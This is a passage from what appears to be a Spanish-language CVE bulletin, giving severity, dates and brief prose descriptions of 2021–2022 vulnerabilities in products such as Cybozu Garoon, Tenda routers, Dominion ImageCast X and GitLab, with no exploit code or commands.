    Se descubrió un problema en TitanFTP (también conocido como Titan FTP) NextGen antes de 1.2.1050. Al instalarse, Microsoft SQL Express 2019 se instala de forma predeterminada con una instancia de SQL que se ejecuta como SYSTEM con BUILTIN\SUsers como sysadmin, lo que permite a los usuarios de Windows sin privilegios ejecutar comandos localmente como NT AUTHORITY\SYSTEM, también conocido como NX-I674 (subproblema 2). NOTA: a partir del 2022-06-21, la versión 1.2.1050 corrige esta vulnerabilidad en una instalación nueva, pero no en una instalación de actualización
  • CVE-2021-40360
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 17/07/2023
    Se ha identificado una vulnerabilidad en SIMATIC PCS 7 V8.2 (Todas las versiones), SIMATIC PCS 7 V9.0 (Todas las versiones), SIMATIC PCS 7 V9.1 (Todas las versiones anteriores a V9. 1 SP1), SIMATIC WinCC V15 y anteriores (Todas las versiones anteriores a V15 SP1 Update 7), SIMATIC WinCC V16 (Todas las versiones anteriores a V16 Update 5), SIMATIC WinCC V17 (Todas las versiones anteriores a V17 Update 2), SIMATIC WinCC V7.4 (Todas las versiones anteriores a V7.4 SP1 Update 19), SIMATIC WinCC V7.5 (Todas las versiones anteriores a V7.5 SP2 Update 6). El hash de la contraseña de una cuenta de usuario local en el servidor remoto podría concederse a través de la API pública a un usuario del sistema afectado. Un atacante autenticado podría forzar el hash de la contraseña y utilizarlo para iniciar sesión en el servidor
  • CVE-2022-28382
    Severidad: MEDIA
    Fecha de publicación: 08/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en determinadas unidades de Verbatim hasta el 31-03-2022. Debido al uso de un modo de encriptación AES no seguro (Electronic Codebook, también se conoce como ECB), un atacante puede ser capaz de extraer información incluso de datos encriptados, por ejemplo, al observar patrones de bytes repetidos. El firmware del controlador de puente USB a SATA INIC-3637EN usa AES-256 con el modo ECB. Este modo de funcionamiento de los cifradores de bloques (por ejemplo, AES) siempre cifra datos de texto plano idénticos, en este caso bloques de 16 bytes, en datos de texto cifrado idénticos. Para algunos datos, por ejemplo las imágenes de mapa de bits, la falta de la propiedad criptográfica llamada difusión, dentro del ECB, puede filtrar información confidencial incluso en los datos cifrados. Por lo tanto, el uso del modo de funcionamiento ECB puede poner en riesgo la confidencialidad de información específica, incluso de forma encriptada. Esto afecta a la unidad Keypad Secure USB versión 3.2 Gen 1, número de pieza 49428, al disco duro portátil Store "n" Go Secure GD25LK01-3637-C VER4.0, a la unidad SSD Executive Fingerprint Secure GDMSFE01-INI3637-C VER1.1 y al disco duro portátil Fingerprint Secure, número de pieza 53650
  • CVE-2022-29892
    Severidad: MEDIA
    Fecha de publicación: 04/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de comprobación de entrada inapropiada en Space de Cybozu Garoon versiones 4.0.0 a 5.5.1, permite a un atacante remoto autenticado mostrar repetidamente errores en determinadas funciones y causar una denegación de servicio (DoS)
  • CVE-2022-29484
    Severidad: MEDIA
    Fecha de publicación: 04/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de la restricción de operación en Space de Cybozu Garoon versiones 4.0.0 a 5.9.0, permite a un atacante remoto autenticado borrar los datos de Space
  • CVE-2022-29471
    Severidad: MEDIA
    Fecha de publicación: 04/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de la restricción de navegación en Bulletin de Cybozu Garoon permite a un atacante remoto autenticado obtener los datos de Bulletin
  • CVE-2022-29467
    Severidad: MEDIA
    Fecha de publicación: 04/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de divulgación de información de direcciones en Cybozu Garoon versiones 4.2.0 a 5.5.1, permite a un atacante remoto autenticado obtener algunos datos de Address
  • CVE-2022-28718
    Severidad: MEDIA
    Fecha de publicación: 04/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de restricciones de operación en Bulletin de Cybozu Garoon versiones 4.0.0 a 5.5.1, permite a un atacante remoto autenticado alterar los datos de Bulletin
  • CVE-2022-28713
    Severidad: MEDIA
    Fecha de publicación: 04/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de autenticación inapropiada en Scheduler de Cybozu Garoon versiones 4.10.0 a 5.5.1, permite a un atacante remoto obtener algunos datos de Facility Information sin iniciar sesión en el producto
  • CVE-2022-28692
    Severidad: MEDIA
    Fecha de publicación: 04/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de comprobación de entrada inapropiada en Scheduler de Cybozu Garoon versiones 4.0.0 a 5.5.1, permite a un atacante remoto autenticado alterar los datos de Scheduler
  • CVE-2022-27807
    Severidad: MEDIA
    Fecha de publicación: 04/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de comprobación de entrada inapropiada en Link de Cybozu Garoon versiones 4.0.0 a 5.5.1, permite a un atacante remoto autenticado deshabilitar add Categories
  • CVE-2022-27661
    Severidad: MEDIA
    Fecha de publicación: 04/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de restricciones de operación en Workflow de Cybozu Garoon versiones 4.0.0 a 5.5.1, permite a un atacante remoto autenticado alterar los datos de Workflow
  • CVE-2022-34151
    Severidad: MEDIA
    Fecha de publicación: 04/07/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de uso de credenciales embebidas en el controlador de automatización de Máquinas serie NJ todos los modelos Versiones 1.48 y anteriores, el controlador de automatización de Máquinas serie NX7 todos los modelos Versiones 1.28 y anteriores, el controlador de automatización de Máquinas serie NX1 todos los modelos Versiones 1.48 y anteriores, el software de automatización "Sysmac Studio" todos los modelos Versiones 1. 49 y anteriores, y Terminal programable (PT) serie NA5-15W/NA5-12W/NA5-9W/NA5-7W modelos Runtime Versiones 1.15 y anteriores, lo que puede permitir a un atacante remoto que haya obtenido con éxito las credenciales de usuario mediante el análisis del producto afectado acceder al controlador
  • CVE-2022-33742
    Severidad: BAJA
    Fecha de publicación: 05/07/2022
    Fecha de última actualización: 20/07/2023
    Unas fuga de datos de frontends de disco/NIC de Linux Este registro de información de CNA se relaciona con múltiples CVE; el texto explica qué aspectos/vulnerabilidades corresponden a qué CVE.] Las interfaces de dispositivos Linux Block y Network PV no ponen a cero las regiones de memoria antes de compartirlas con el backend (CVE-2022-26365, CVE-2022-33740). Además, la granularidad de la tabla de concesión no permite compartir menos de una página de 4K, lo que hace que los datos no relacionados que residen en la misma página de 4K que los datos compartidos con un backend sean accesibles por dicho backend (CVE-2022-33741, CVE-2022- 33742)
  • CVE-2022-33741
    Severidad: BAJA
    Fecha de publicación: 05/07/2022
    Fecha de última actualización: 20/07/2023
    Unas fuga de datos de frontends de disco/NIC de Linux Este registro de información de CNA se relaciona con múltiples CVE; el texto explica qué aspectos/vulnerabilidades corresponden a qué CVE.] Las interfaces de dispositivos Linux Block y Network PV no ponen a cero las regiones de memoria antes de compartirlas con el backend (CVE-2022-26365, CVE-2022-33740). Además, la granularidad de la tabla de concesión no permite compartir menos de una página de 4K, lo que hace que los datos no relacionados que residen en la misma página de 4K que los datos compartidos con un backend sean accesibles por dicho backend (CVE-2022-33741, CVE-2022- 33742)
  • CVE-2022-33740
    Severidad: BAJA
    Fecha de publicación: 05/07/2022
    Fecha de última actualización: 08/08/2023
    Unas fuga de datos de frontends de disco/NIC de Linux Este registro de información de CNA se relaciona con múltiples CVE; el texto explica qué aspectos/vulnerabilidades corresponden a qué CVE.] Las interfaces de dispositivos Linux Block y Network PV no ponen a cero las regiones de memoria antes de compartirlas con el backend (CVE-2022-26365, CVE-2022-33740). Además, la granularidad de la tabla de concesión no permite compartir menos de una página de 4K, lo que hace que los datos no relacionados que residen en la misma página de 4K que los datos compartidos con un backend sean accesibles por dicho backend (CVE-2022-33741, CVE-2022- 33742)
  • CVE-2022-26365
    Severidad: BAJA
    Fecha de publicación: 05/07/2022
    Fecha de última actualización: 08/08/2023
    Unas fuga de datos de frontends de disco/NIC de Linux Este registro de información de CNA se relaciona con múltiples CVE; el texto explica qué aspectos/vulnerabilidades corresponden a qué CVE.] Las interfaces de dispositivos Linux Block y Network PV no ponen a cero las regiones de memoria antes de compartirlas con el backend (CVE-2022-26365, CVE-2022-33740). Además, la granularidad de la tabla de concesión no permite compartir menos de una página de 4K, lo que hace que los datos no relacionados que residen en la misma página de 4K que los datos compartidos con un backend sean accesibles por dicho backend (CVE-2022-33741, CVE-2022- 33742)
  • CVE-2022-28620
    Severidad: ALTA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de omisión de autenticación remota en HPE Cray Legacy Shasta System Solutions versiones; HPE Slingshot; y HPE Cray EX: Antes del firmware del controlador de nodo asociado a HPE Cray EX liquid cooled blades, y todas las versiones del firmware del controlador de chasis asociado a HPE Cray EX liquid cooled cabinets anteriores a 1.6.27/1.5.33/1.4.27; Todas las versiones de Slingshot anteriores a 1.7.2; Todas las versiones del firmware del controlador de nodo asociado a HPE Cray EX liquid cooled blades, y todas las versiones del firmware de HPE Cray EX liquid cooled cabinets anteriores a 1.6.27/1.5.33/1.4.27. HPE ha proporcionado una actualización de software para resolver esta vulnerabilidad en HPE Cray Legacy Shasta System Solutions, HPE Slingshot y HPE Cray EX Supercomputers
  • CVE-2022-25584
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Seyeon Tech Co., Ltd FlexWATCH FW3170-PS-E Network Video System versión 4.23-3000_GY permite a atacantes acceder a información confidencial
  • CVE-2022-29330
    Severidad: MEDIA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    Una falta de control de acceso en el sistema de respaldo de Telesoft VitalPBX versiones anteriores a 3.2.1, permite a atacantes acceder a las credenciales de las extensiones PJSIP y SIP, a las claves criptográficas y los archivos de mensajes de voz por medio de vectores no especificados
  • CVE-2022-1746
    Severidad: ALTA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 24/07/2023
    El mecanismo de autenticación usado por los trabajadores electorales para administrar la votación usando la versión probada de Dominion Voting Systems ImageCast X puede exponer secretos criptográficos usados para proteger la información electoral. Un atacante podría aprovechar esta vulnerabilidad para obtener acceso a información confidencial y llevar a cabo acciones privilegiadas, afectando potencialmente a otros equipos electorales
  • CVE-2022-1741
    Severidad: ALTA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    La versión probada de Dominion Voting Systems ImageCast X presenta una aplicación de emulador de terminal que podría ser aprovechada por un atacante para obtener altos privilegios en un dispositivo y/o instalar código malicioso
  • CVE-2022-1740
    Severidad: BAJA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 24/07/2023
    La versión probada de Dominion Voting Systems ImageCast X cuenta con la función de visualización de hash de aplicaciones en pantalla, la exportación de registros de auditoría y la funcionalidad application export, que son basados en mecanismos de auto-certificación. Un atacante podría aprovechar esta vulnerabilidad para disfrazar aplicaciones maliciosas en un dispositivo
  • CVE-2022-32310
    Severidad: ALTA
    Fecha de publicación: 05/07/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en Ingredient Stock Management System versión v1.0, permite a atacantes tomar el control de las cuentas de los usuarios por medio de una petición POST diseñada en el archivo /isms/classes/Users.php
  • CVE-2021-40893
    Severidad: MEDIA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de Denegación de Servicio por Expresiones Regulares (ReDOS) en validate-data versión v0.1.1, cuando son comprobados correos electrónicos no válidos diseñados
  • CVE-2022-21784
    Severidad: MEDIA
    Fecha de publicación: 06/07/2022
    Fecha de última actualización: 08/08/2023
    En WLAN driver, es posible sea producida una escritura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID de parche: ALPS06704526; ID de incidencia: ALPS06704462
  • CVE-2022-21766
    Severidad: MEDIA
    Fecha de publicación: 06/07/2022
    Fecha de última actualización: 08/08/2023
    En CCCI, es posible sea producida una escritura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS06641673; ID de incidencia: ALPS06641653
  • CVE-2022-21765
    Severidad: MEDIA
    Fecha de publicación: 06/07/2022
    Fecha de última actualización: 08/08/2023
    En CCCI, es posible sea producida una escritura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS06641673; ID de incidencia: ALPS06641673
  • CVE-2022-34296
    Severidad: MEDIA
    Fecha de publicación: 23/06/2022
    Fecha de última actualización: 08/08/2023
    En Zalando Skipper versiones anteriores a 0.13.218, podía omitirse un predicado de consulta por medio de una petición preparada
  • CVE-2022-34298
    Severidad: MEDIA
    Fecha de publicación: 23/06/2022
    Fecha de última actualización: 08/08/2023
    El módulo NT auth en OpenAM versiones anteriores a 14.6.6, permite un "ataque de reemplazo de nombre de usuario Samba"
  • CVE-2021-40895
    Severidad: MEDIA
    Fecha de publicación: 27/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de Denegación de Servicio por Expresiones Regulares (ReDOS) en todo-regex versión v0.1.1, cuando son comparados declaraciones TODO diseñadas de forma no válida
  • CVE-2021-40896
    Severidad: MEDIA
    Fecha de publicación: 27/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de Denegación de Servicio por Expresiones Regulares (ReDOS) en that-value versión v0.1.3, cuando son comprobados correos electrónicos no válidos diseñados
  • CVE-2021-40897
    Severidad: MEDIA
    Fecha de publicación: 27/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de Denegación de Servicio por Expresiones Regulares (ReDOS) en split-html-to-chars versión v1.0.5, cuando son divididos htmls no válidos diseñados
  • CVE-2021-40898
    Severidad: MEDIA
    Fecha de publicación: 27/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de Denegación de Servicio por Expresiones Regulares (ReDOS) en scaffold-helper versión v1.2.0, cuando son copiados archivos no válidos diseñados
  • CVE-2021-40899
    Severidad: MEDIA
    Fecha de publicación: 27/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de Denegación de Servicio por Expresiones Regulares (ReDOS) en repo-git-downloader versión v0.1.1, cuando son descargados repositorios git no válidos diseñados
  • CVE-2021-40900
    Severidad: MEDIA
    Fecha de publicación: 27/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de Denegación de Servicio por Expresión Regular (ReDOS) en regexfn versión v1.0.5, cuando son comprobados correos electrónicos no válidos diseñados
  • CVE-2021-40901
    Severidad: MEDIA
    Fecha de publicación: 27/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de Denegación de Servicio por Expresión Regular (ReDOS) en scniro-validator v1.0.1 cuando son comprobados correos electrónicos no válidos diseñados
  • CVE-2022-34597
    Severidad: ALTA
    Fecha de publicación: 06/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AX1806 versión v1.0.0.1, contiene una vulnerabilidad de inyección de comandos por medio de la función WanParameterSetting
  • CVE-2022-34596
    Severidad: ALTA
    Fecha de publicación: 06/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AX1803 versión v1.0.0.1_2890, contiene una vulnerabilidad de inyección de comandos por medio de la función WanParameterSetting
  • CVE-2022-34595
    Severidad: ALTA
    Fecha de publicación: 06/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AX1803 versión v1.0.0.1_2890, contiene una vulnerabilidad de inyección de comandos por medio de la función setipv6status
  • CVE-2022-22617
    Severidad: MEDIA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de lógica con una administración de estados mejorada. Este problema es corregido en macOS Big Sur versión 11.6.5, macOS Monterey versión 12.3 y Security Update 2022-003 Catalina. Una aplicación puede ser capaz de alcanzar altos privilegios
  • CVE-2022-22487
    Severidad: MEDIA
    Fecha de publicación: 30/06/2022
    Fecha de última actualización: 08/08/2023
    Un agente de almacenamiento de IBM Spectrum Protect podría permitir a un atacante remoto llevar a cabo un ataque de fuerza bruta al permitir intentos ilimitados de inicio de sesión en el agente de almacenamiento sin bloquear el ID administrativo. Un atacante remoto podría aprovechar esta vulnerabilidad usando técnicas de fuerza bruta para conseguir acceso administrativo no autorizado tanto al agente de almacenamiento de IBM Spectrum Protect como al servidor de IBM Spectrum Protect versiones 8.1.0.000 hasta 8.1.14 con el que es comunicado. IBM X-Force ID: 226326
  • CVE-2022-27549
    Severidad: BAJA
    Fecha de publicación: 06/07/2022
    Fecha de última actualización: 18/07/2023
    HCL Launch puede almacenar determinados datos para actividades recurrentes en un formato de texto plano
  • CVE-2022-20859
    Severidad: ALTA
    Fecha de publicación: 06/07/2022
    Fecha de última actualización: 24/07/2023
    Una vulnerabilidad en el marco de Recuperación de Desastres de Cisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager IM & Presence Service (Unified CM IM&P), y Cisco Unity Connection podría permitir a un atacante autenticado y remoto llevar a cabo determinadas acciones administrativas que no deberían poder. Esta vulnerabilidad es debido a una comprobación de control de acceso insuficiente en el dispositivo afectado. Un atacante con privilegios de sólo lectura podría explotar esta vulnerabilidad al ejecutar un comando vulnerable específico en un dispositivo afectado. Una explotación con éxito podría permitir al atacante llevar a cabo una serie de acciones administrativas que no debería poder realizar
  • CVE-2021-40894
    Severidad: MEDIA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de Denegación de Servicio de Expresiones Regulares (ReDOS) en underscore-99xp versión v1.7.2, cuando es llamada a la función deepValueSearch
  • CVE-2021-30651
    Severidad: MEDIA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    Un usuario administrador de SMG autenticado y malicioso puede obtener las contraseñas de servidores LDAP/Active Directory externos a los que, de otro modo, no estaría autorizado a acceder
  • CVE-2021-40606
    Severidad: MEDIA
    Fecha de publicación: 28/06/2022
    Fecha de última actualización: 08/08/2023
    La función gf_bs_write_data de GPAC versión 1.0.1, permite a atacantes causar una denegación de servicio por medio de un archivo diseñado en el comando MP4Box
  • CVE-2022-32092
    Severidad: ALTA
    Fecha de publicación: 27/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que D-Link DIR-645 versión v1.03, contiene una vulnerabilidad de inyección de comandos por medio del parámetro QUERY_STRING en el archivo __ajax_explorer.sgi
  • CVE-2022-31034
    Severidad: MEDIA
    Fecha de publicación: 27/06/2022
    Fecha de última actualización: 21/07/2023
    Argo CD es una herramienta declarativa de entrega continua GitOps para Kubernetes. Todas las versiones de Argo CD a partir de la v0.11.0, son vulnerables a una variedad de ataques cuando es iniciado un inicio de sesión SSO desde la CLI o la UI de Argo CD. Las vulnerabilidades son debido a un uso de valores insuficientemente aleatorios en los parámetros de los flujos de inicio de sesión Oauth2/OIDC. En cada caso, el uso de una semilla relativamente predecible (basada en el tiempo) en un generador de números pseudoaleatorios no seguro desde el punto de vista criptográfico hizo que el parámetro fuera menos aleatorio de lo requerido por la especificación correspondiente o por las mejores prácticas generales. En algunos casos, el uso de un valor demasiado corto hacía que la entropía fuera aún menos suficiente. Los ataques a los flujos de inicio de sesión que pretenden mitigarse con estos parámetros son difíciles de llevar a cabo, pero pueden tener un alto impacto, pudiendo conceder a un atacante acceso de administrador a Argo CD. Han sido publicados parches para esta vulnerabilidad en las siguientes versiones de Argo CD: v2.4.1, v2.3.5, v2.2.10 y v2.1.16. No son conocidas mitigaciones para esta vulnerabilidad
  • CVE-2021-40553
    Severidad: MEDIA
    Fecha de publicación: 28/06/2022
    Fecha de última actualización: 08/08/2023
    piwigo versión 11.5.0, está afectado por una vulnerabilidad de ejecución de código remota (RCE) en el Editor de Archivos Locales
  • CVE-2022-28166
    Severidad: MEDIA
    Fecha de publicación: 27/06/2022
    Fecha de última actualización: 08/08/2023
    En Brocade SANnav versiones anteriores a SANN2.2.0.2 y Brocade SANNav versiones anteriores a 2.1.1.8, la implementación del servidor TLS/SSL admite el uso de cifrados de clave estática (ssl-static-key-ciphers) en los puertos 443 y 18082
  • CVE-2022-28167
    Severidad: MEDIA
    Fecha de publicación: 27/06/2022
    Fecha de última actualización: 08/08/2023
    Brocade SANnav versiones anteriores a Brocade SANvav versión 2.2.0.2 y Brocade SANanv versión 2.1.1.8, registra la contraseña del conmutador Brocade Fabric OS en texto plano en el archivo asyncjobscheduler-manager.log
  • CVE-2021-46825
    Severidad: MEDIA
    Fecha de publicación: 07/07/2022
    Fecha de última actualización: 08/08/2023
    Symantec Advanced Secure Gateway (ASG) y ProxySG son susceptibles a una vulnerabilidad de desincronización HTTP. Cuando un atacante remoto no autenticado y otros clientes web se comunican a mediante el proxy con el mismo servidor web, el atacante puede enviar peticiones HTTP diseñadas y causar que el proxy reenvíe las respuestas del servidor web a clientes no deseados. Gravedad/CVSSv3: Alta / 8.1 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
  • CVE-2021-40642
    Severidad: MEDIA
    Fecha de publicación: 29/06/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en Textpattern CMS versiones v4.8.7 y anteriores, se presenta mediante la cookie confidencial en la sesión HTTPS sin el atributo "Secure" por medio del archivo textpattern/lib/txplib_misc.php. El flag seguro no está establecida para la cookie de sesión txp_login en la aplicación. Si el flag seguro no está establecido, entonces la cookie será transmitida en texto sin cifrar si el usuario visita cualquier URL HTTP dentro del ámbito de la cookie. Un atacante puede ser capaz de inducir este evento al alimentar al usuario con enlaces apropiados, ya sea directamente o por medio de otro sitio web
  • CVE-2022-33680
    Severidad: MEDIA
    Fecha de publicación: 07/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Edge (basado en Chromium). Este ID de CVE es diferente de CVE-2022-30192, CVE-2022-33638, CVE-2022-33639
  • CVE-2022-32054
    Severidad: ALTA
    Fecha de publicación: 07/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC10 versión US_AC10V1.0RTL_V15.03.06.26_multi_TD01 contiene una vulnerabilidad de ejecución de código remota (RCE) por medio del parámetro lanIp
  • CVE-2022-29271
    Severidad: MEDIA
    Fecha de publicación: 28/06/2022
    Fecha de última actualización: 08/08/2023
    En Nagios XI versiones hasta 5.8.5, un usuario de Nagios de sólo lectura (debido a una comprobación de permisos incorrecta) es capaz de programar el tiempo de inactividad de cualquier host/servicio. Esto permite a un atacante deshabilitar permanentemente todas las comprobaciones de monitorización
  • CVE-2021-41559
    Severidad: MEDIA
    Fecha de publicación: 28/06/2022
    Fecha de última actualización: 08/08/2023
    Silverstripe silverstripe/framework 4.8.1, presenta una explosión cuadrática en la función Convert::xml2array() que permite un ataque remoto por medio de un documento XML diseñado
  • CVE-2022-31884
    Severidad: MEDIA
    Fecha de publicación: 28/06/2022
    Fecha de última actualización: 08/08/2023
    Marval MSM versión v14.19.0.12476, presenta una vulnerabilidad de Control de Acceso Inapropiado que permite a un usuario poco privilegiado eliminar las Claves API de otros usuarios, incluyendo las Claves API de los usuarios de altos privilegios y del Administrador
  • CVE-2022-31129
    Severidad: MEDIA
    Fecha de publicación: 06/07/2022
    Fecha de última actualización: 24/07/2023
    moment es una biblioteca de fechas en JavaScript para analizar, comprobar, manipular y formatear fechas. Se ha detectado que las versiones afectadas de moment usan un algoritmo de análisis sintáctico ineficiente. Concretamente, el análisis sintáctico de cadena a fecha en moment (más concretamente el análisis sintáctico rfc2822, que es intentado por defecto) presenta una complejidad cuadrática (N^2) en entradas específicas. Los usuarios pueden notar una notable ralentización con entradas de más de 10k caracteres. Los usuarios que pasan cadenas proporcionadas por el usuario sin comprobaciones de longitud de cordura al constructor del momento son vulnerables a ataques (Re)DoS. El problema está parcheado en versión 2.29.4, el parche puede aplicarse a todas las versiones afectadas con un mínimo ajuste. Es recomendado a usuarios actualicen. Los usuarios que no puedan actualizar deberían considerar la posibilidad de limitar la longitud de las fechas aceptadas por el usuario
  • CVE-2022-29269
    Severidad: MEDIA
    Fecha de publicación: 28/06/2022
    Fecha de última actualización: 08/08/2023
    En Nagios XI versiones hasta 5.8.5, en la función schedule report, un atacante autenticado es capaz de inyectar etiquetas HTML que conllevan a un reformateo/edición de correos electrónicos desde una dirección de correo oficial
  • CVE-2022-29270
    Severidad: MEDIA
    Fecha de publicación: 28/06/2022
    Fecha de última actualización: 08/08/2023
    En Nagios XI versiones hasta 5.8.5, es posible que un usuario sin verificación de contraseña cambie su dirección de correo electrónico
  • CVE-2022-32481
    Severidad: ALTA
    Fecha de publicación: 07/07/2022
    Fecha de última actualización: 08/08/2023
    Dell PowerProtect Cyber Recovery, versiones anteriores a 19.11, contienen una vulnerabilidad de escalada de privilegios en implementaciones de dispositivos virtuales. Un usuario autenticado poco privilegiado puede encadenar los comandos de Docker para escalar los privilegios a root, conllevando a una toma completa del sistema
  • CVE-2022-2048
    Severidad: MEDIA
    Fecha de publicación: 07/07/2022
    Fecha de última actualización: 24/07/2023
    En la implementación del servidor Eclipse Jetty HTTP/2, cuando es encontrada una petición HTTP/2 no válida, el manejo de errores presenta un error que puede terminar por no limpiar apropiadamente las conexiones activas y los recursos asociados. Esto puede conllevar a un escenario de denegación de servicio en el que no queden recursos suficientes para procesar las peticiones buenas
  • CVE-2022-22494
    Severidad: MEDIA
    Fecha de publicación: 30/06/2022
    Fecha de última actualización: 08/08/2023
    IBM Spectrum Protect Operations Center 8.1.0.000 hasta 8.1.14, podría permitir a un atacante remoto conseguir detalles de la base de datos, como el tipo y la versión, mediante el envío de una petición HTTP especialmente diseñada. Esta información podría usarse en futuros ataques. IBM X-Force ID: 226940
  • CVE-2022-34043
    Severidad: MEDIA
    Fecha de publicación: 29/06/2022
    Fecha de última actualización: 08/08/2023
    Unos permisos incorrectos para la carpeta C:\ProgramData\NSinMachine\Ndesinstalación de Nomachine versión v7.9.2, permite a atacantes llevar a cabo un ataque de secuestro de DLL y ejecutar código arbitrario
  • CVE-2022-22373
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de comprobación inapropiada en IBM InfoSphere Information Server versión 11.7 Pack for SAP Apps and BW Packs, puede conllevar a una creación de directorios y archivos en el sistema de archivos del servidor que pueden contener información de depuración no confidencial, como rastros de pila. IBM X-Force ID: 221323
  • CVE-2022-35406
    Severidad: MEDIA
    Fecha de publicación: 08/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema de divulgación de URL en Burp Suite versiones anteriores a 2022.6. Si un usuario visualiza una respuesta diseñada en el Repetidor o el Intruso, puede interpretarse incorrectamente como un redireccionamiento
  • CVE-2021-38954
    Severidad: MEDIA
    Fecha de publicación: 30/06/2022
    Fecha de última actualización: 08/08/2023
    IBM Sterling B2B Integrator Standard Edition versiones 6.0.0.0 hasta 6.0.3.5 y 6.1.0.0 hasta 6.1.1.0, podría divulgar información confidencial de la versión que podría ayudar en futuros ataques contra el sistema. IBM X-Force ID: 211414
  • CVE-2022-34306
    Severidad: MEDIA
    Fecha de publicación: 08/07/2022
    Fecha de última actualización: 08/08/2023
    IBM CICS TX Standard y Advanced versión 11.1, es vulnerable a una inyección de encabezado HTTP, causada por una comprobación inapropiada de la entrada de los encabezados HOST. Esto podría permitir a un atacante conducir varios ataques contra el sistema vulnerable, incluyendo cross-site scripting, envenenamiento de caché o secuestro de sesión. IBM X-Force ID: 229435
  • CVE-2022-34160
    Severidad: MEDIA
    Fecha de publicación: 08/07/2022
    Fecha de última actualización: 08/08/2023
    IBM CICS TX Standard y Advanced versión 11.1, es vulnerable a una inyección de HTML. Un atacante remoto podría inyectar código HTML malicioso que, cuando sea visualizado, será ejecutado en el navegador web de la víctima dentro del contexto de seguridad del sitio de alojamiento. IBM X-Force ID: 229330
  • CVE-2022-2185
    Severidad: ALTA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha descubierto un problema crítico en GitLab que afecta a todas las versiones a partir de la 14.0 anterior a la 14.10.5, la 15.0 anterior a la 15.0.4 y la 15.1 anterior a la 15.1.1, en el que un usuario autenticado y autorizado a importar proyectos podría importar un proyecto malicioso que condujera a la ejecución remota de código
  • CVE-2022-1983
    Severidad: MEDIA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Una autorización incorrecta en GitLab EE afectando a todas las versiones desde la 10.7 anteriores a 14.10.5, 15.0 anteriores a 15.0.4 y 15.1 anteriores a 15.1.1, permitía a un atacante que ya estuviera en posesión de una clave de despliegue válida o de un token de despliegue hacer un uso no debido de la misma desde cualquier lugar para acceder a los registros de contenedores, incluso cuando habían sido configuradas restricciones de direcciones IP
  • CVE-2021-37791
    Severidad: MEDIA
    Fecha de publicación: 30/06/2022
    Fecha de última actualización: 08/08/2023
    MyAdmin versión v1.0, está afectado por una vulnerabilidad de control de acceso incorrecto en la visualización del centro personal en /api/user/userData?userCode=admin
  • CVE-2022-32031
    Severidad: ALTA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AX1806 versión v1.0.0.1, contiene un desbordamiento de pila por medio del parámetro list en la función fromSetRouteStatic
  • CVE-2022-32030
    Severidad: ALTA
    Fecha de publicación: 01/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AX1806 versión v1.0.0.1, contiene un desbordamiento de pila por medio del parámetro list en la función formSetQosBand
  • CVE-2022-2097
